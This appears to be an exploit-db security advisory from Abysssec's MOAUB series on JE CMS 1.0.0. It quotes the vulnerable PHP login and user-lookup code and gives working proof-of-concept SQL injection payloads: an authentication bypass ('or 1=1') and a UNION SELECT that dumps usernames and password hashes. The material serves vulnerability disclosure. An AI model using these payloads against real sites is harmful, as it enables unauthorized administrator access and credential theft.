''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-28-je-cms-1-0-0-bypass-authentication-by-sql-injection-vulnerability/ ''' Title : JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability Affected Version : JE CMS <= 1.0.0 Vendor Site : joenasejes.cz.cc Discovery : abysssec.com Vulnerabilites : 1. Bypass Authentication by SQL Injection Vulnerability in administrator\login.php page, lines 16-20: if (isset($_REQUEST['username'])) { $username = $_REQUEST['username']; $password = $_REQUEST['password']; $result = $core->userLogin(); userLogin() function is in administrator\library\functions.php. in lines 129-139: if ($userName == '' || $password == '') { $errorMessage = JE_MISMATCH_USERNAME_PASSWORD; } else { // check the database and see if the username and password combo do match $sql = "SELECT userid FROM users WHERE username = '".$userName."' // vulnerability is here AND password = '".$this->getHash($password)."' // vulnerability is here AND usertype = 1 AND block = 0"; $result = $this->JEQuery($sql); POC: in administrator/login.php: username: admin' or '1'='1 password: admin' or '1'='1 2. SQL injection in administrator\index.php on "userid" parameter: in administrator\index.php file line 12: $userid = $_REQUEST['userid']; lines 52-53: case 'edituser' : $user = $core->getUser($userid); getUser function is in administrator\library\functions.php file. lines 578-583: function getUser($id){ $sql = "SELECT * FROM users WHERE userid = ".$id; // vulnerability is here $result = $this->JEQuery($sql); POC: http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--